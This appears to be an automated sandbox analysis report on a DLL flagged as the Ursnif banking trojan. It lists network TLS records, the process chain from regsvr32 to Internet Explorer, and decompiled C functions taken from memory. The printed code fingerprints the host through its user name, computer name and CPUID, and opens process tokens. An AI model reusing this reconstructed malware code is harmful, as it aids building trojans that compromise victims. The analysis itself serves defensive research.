Nov 19, 2020 09:11:58.186707973 CET	87.248.118.22	443	192.168.2.5	49746	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Sun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.186707973 CET	87.248.118.22	443	192.168.2.5	49746	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.189384937 CET	151.101.1.44	443	192.168.2.5	49749	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.189384937 CET	151.101.1.44	443	192.168.2.5	49749	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.209878922 CET	87.248.118.22	443	192.168.2.5	49747	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Sun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.209878922 CET	87.248.118.22	443	192.168.2.5	49747	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6628 Parent PID: 5652

General

Start time:	09:11:44
Start date:	19/11/2020
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
Imagebase:	0x2b0000
File size:	119808 bytes
MD5 hash:	62442CB29236B024E992A556DA72B97A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 6644 Parent PID: 6628

General

Start time:	09:11:44
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
Imagebase:	0x90000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 6652 Parent PID: 6628

General

Start time:	09:11:45
Start date:	19/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6672 Parent PID: 6652

General

Start time:	09:11:45
Start date:	19/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff785680000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6724 Parent PID: 6672

General

Start time:	09:11:48
Start date:	19/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Imagebase:	0x2a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 7052 Parent PID: 6672

General

Start time:	09:11:51
Start date:	19/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2
Imagebase:	0x7ff797770000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4596 Parent PID: 6672

General

Start time:	09:12:29
Start date:	19/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2
Imagebase:	0x2a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6644 Parent PID: 6628 regsvr32.exeCOMMON

Executed Functions

Function 044B523B, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E044B523B(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x44bd2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x44bd238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x44bd2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x44bd238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x44bd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x44bd2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x44bd2a4; // 0x8ca5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x44be7e8; // 0x73797325
				_t83 = E044B67CF(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x44bd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x44bd2a4; // 0x8ca5a8
				_t16 = _t93 + 0x44be809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x044b5244
0x044b524a
0x044b524c
0x044b5266
0x044b5268
0x044b526d
0x044b54e2
0x044b54e9
0x044b54e9
0x044b5273
0x044b5288
0x044b528a
0x044b528c
0x044b5291
0x044b54d2
0x044b54dc
0x00000000
0x044b54dc
0x044b5297
0x044b52a2
0x044b52a7
0x044b52ac
0x044b52af
0x044b52b6
0x044b52bb
0x044b52c0
0x044b54c2
0x044b54cc
0x00000000
0x044b54cc
0x044b52d6
0x044b52da
0x044b52dd
0x044b52e0
0x044b52e6
0x044b52eb
0x044b52f4
0x044b52fa
0x044b5304
0x044b530b
0x044b530b
0x044b531d
0x044b5328
0x044b5336
0x044b533b
0x044b5340
0x044b5343
0x044b5348
0x044b5352
0x044b5355
0x044b5358
0x044b536e
0x044b5370
0x044b5375
0x044b54c0
0x00000000
0x044b54c0
0x044b538c
0x044b53dd
0x044b53a0
0x044b53a8
0x044b53ad
0x044b53bb
0x044b53c4
0x044b53cd
0x044b53cd
0x044b53db
0x044b53db
0x044b53e1
0x044b53e5
0x044b53e5
0x044b53eb
0x00000000
0x00000000
0x044b53ed
0x044b53f3
0x044b549a
0x044b549d
0x044b54aa
0x044b54aa
0x044b54ae
0x00000000
0x00000000
0x044b54a3
0x044b54a7
0x044b54a7
0x044b54a9
0x044b54a9
0x044b54b3
0x044b54ba
0x044b54bc
0x00000000
0x044b54bc
0x044b53f9
0x044b53fb
0x044b53fb
0x044b540e
0x044b5414
0x044b541f
0x044b5421
0x044b5425
0x044b5427
0x044b5427
0x044b542c
0x044b542e
0x044b542e
0x044b542c
0x044b5433
0x044b5437
0x044b5437
0x044b5447
0x044b544c
0x044b544f
0x044b544f
0x044b5452
0x044b545c
0x044b5464
0x044b5469
0x044b5477
0x044b5477
0x044b548b
0x044b548f
0x044b548f

APIs

RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 044B5266
RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 044B5288
memset.NTDLL ref: 044B52A2

Part of subcall function 044B67CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,044B52BB,73797325), ref: 044B67E0
Part of subcall function 044B67CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 044B67FA

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 044B52E0
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 044B52F4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 044B530B
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 044B5317
lstrcat.KERNEL32(?,642E2A5C), ref: 044B5358
FindFirstFileA.KERNELBASE(?,?), ref: 044B536E
CompareFileTime.KERNEL32(?,?), ref: 044B538C
FindNextFileA.KERNELBASE(044B857A,?), ref: 044B53A0
FindClose.KERNEL32(044B857A), ref: 044B53AD
FindFirstFileA.KERNEL32(?,?), ref: 044B53B9
CompareFileTime.KERNEL32(?,?), ref: 044B53DB
StrChrA.SHLWAPI(?,0000002E), ref: 044B540E
memcpy.NTDLL(00000000,?,00000000), ref: 044B5447
FindNextFileA.KERNELBASE(044B857A,?), ref: 044B545C
FindClose.KERNEL32(044B857A), ref: 044B5469
FindFirstFileA.KERNEL32(?,?), ref: 044B5475
CompareFileTime.KERNEL32(?,?), ref: 044B5485
FindClose.KERNELBASE(044B857A), ref: 044B54BA
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 044B54CC
HeapFree.KERNEL32(00000000,?), ref: 044B54DC

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: c3da10dfd7d7550137c21a675a35cbce8f025ca33ac844cca619098977999740
Instruction ID: a2097cab60de40c0fa97fd9f69265296899721bf6765292085290575383db6f3
Opcode Fuzzy Hash: c3da10dfd7d7550137c21a675a35cbce8f025ca33ac844cca619098977999740
Instruction Fuzzy Hash: 64816AB1D00219AFEF119FA5DC85AEEFBB8FF44305F1004AAE545E6250E774AA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401006, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401006(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404144;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0040217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401006
0x0040100f
0x00401013
0x00401019
0x0040101e
0x00401023
0x00401026
0x00401029
0x0040102e
0x0040102f
0x00401032
0x0040103d
0x00401044
0x00401048
0x0040104a
0x0040104b
0x0040104e
0x00401053
0x0040105d
0x0040105f
0x0040105f
0x00401073
0x00401079
0x0040107d
0x004010cd
0x0040107f
0x00401088
0x0040109e
0x004010a6
0x004010b8
0x004010bc
0x00000000
0x00000000
0x004010a8
0x004010ab
0x004010b0
0x004010b2
0x004010b2
0x00401093
0x00401095
0x004010be
0x004010bf
0x004010bf
0x00401088
0x004010d5

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401013
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401029
_snwprintf.NTDLL ref: 0040104E
CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 00401073
GetLastError.KERNEL32 ref: 0040108A
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0040109E
GetLastError.KERNEL32 ref: 004010B6
CloseHandle.KERNEL32(00000000), ref: 004010BF
GetLastError.KERNEL32 ref: 004010C7

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: cc4cc66df72d4f96b475c83e7a008f4cd12fe47a4f372f670fb728bf5e445f69
Instruction ID: ea09faa938d52f1f2d08e9cc741d5f9c7979f338b4a6f7dd8211bfae97b34356
Opcode Fuzzy Hash: cc4cc66df72d4f96b475c83e7a008f4cd12fe47a4f372f670fb728bf5e445f69
Instruction Fuzzy Hash: 0B21C5B2600148BFD710AFA4CC88EAE3BADEB84355F104136F605F72E0D6745D858B69

Uniqueness

Uniqueness Score: -1.00%

Function 044B65CE, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E044B65CE(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x44bd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E044B5043( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x44bd2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x44bd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E044B3769(_v8 + _v8, _t64);
							}
							HeapFree( *0x44bd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x44bd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E044B3769(_v8 + _v8, _t64);
						}
						HeapFree( *0x44bd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x044b65ce
0x044b65d6
0x044b65da
0x044b65dd
0x044b65e2
0x044b65e4
0x044b65e9
0x044b65e9
0x044b65ef
0x044b65f1
0x044b65fe
0x044b665f
0x044b6600
0x044b6605
0x044b660b
0x044b6610
0x044b661e
0x044b6622
0x044b6631
0x044b6638
0x044b663f
0x044b663f
0x044b664a
0x044b664a
0x044b6622
0x044b6610
0x044b6661
0x044b6667
0x044b6671
0x044b6673
0x044b6678
0x044b6687
0x044b668b
0x044b6696
0x044b669d
0x044b66a4
0x044b66a4
0x044b66b0
0x044b66b0
0x044b668b
0x044b66bb
0x044b66bd
0x044b66c0
0x044b66c2
0x044b66c5
0x044b66c8
0x044b66d2
0x044b66d6
0x044b66da

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 044B6605
RtlAllocateHeap.NTDLL(00000000,?), ref: 044B661C
GetUserNameW.ADVAPI32(00000000,?), ref: 044B6629
HeapFree.KERNEL32(00000000,00000000), ref: 044B664A
GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B6671
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 044B6685
GetComputerNameW.KERNEL32(00000000,00000000), ref: 044B6692
HeapFree.KERNEL32(00000000,00000000), ref: 044B66B0

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: b88844aa2302d83d80ed0783c3c002a0974b505483945e1ec96fc95e08490811
Instruction ID: 744643c675696fd5efad6cbf322734e8395177f80f374d359f8e136e03020809
Opcode Fuzzy Hash: b88844aa2302d83d80ed0783c3c002a0974b505483945e1ec96fc95e08490811
Instruction Fuzzy Hash: 66313CB1A00205EFEB14DFA9DD81AAEF7F9EF44304F11806AE545D3210DB34EE119BA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B6066, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E044B6066(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E044B6D10(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E044B45B3(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x044b6073
0x044b6074
0x044b6075
0x044b6076
0x044b6077
0x044b607b
0x044b6082
0x044b6091
0x044b6094
0x044b6097
0x044b609e
0x044b60a1
0x044b60a4
0x044b60a7
0x044b60aa
0x044b60b5
0x044b60b7
0x044b60c0
0x044b60c8
0x044b60ca
0x044b60dc
0x044b60e6
0x044b60ea
0x044b60f9
0x044b60fd
0x044b6106
0x044b610e
0x044b610e
0x044b6110
0x044b6110
0x044b6118
0x044b611e
0x044b6122
0x044b6122
0x044b612d

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 044B60AD
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 044B60C0
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B60DC

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 044B60F9
memcpy.NTDLL(?,00000000,0000001C), ref: 044B6106
NtClose.NTDLL(?), ref: 044B6118
NtClose.NTDLL(00000000), ref: 044B6122

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: f80c21c899d44eb806c98152bdecc4e25c9713e3b5e0a331ebd6cdac6b0ed3f0
Instruction ID: 791b4fe4cb2c1a60ccf07df8aba3571e8f5a0368d612342b45930edddc75157c
Opcode Fuzzy Hash: f80c21c899d44eb806c98152bdecc4e25c9713e3b5e0a331ebd6cdac6b0ed3f0
Instruction Fuzzy Hash: B321E6B2900228BBEF019FA5CC859DEBFBDEF08740F11402AFA45B6211D7759A549FE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401E57, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401E57(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
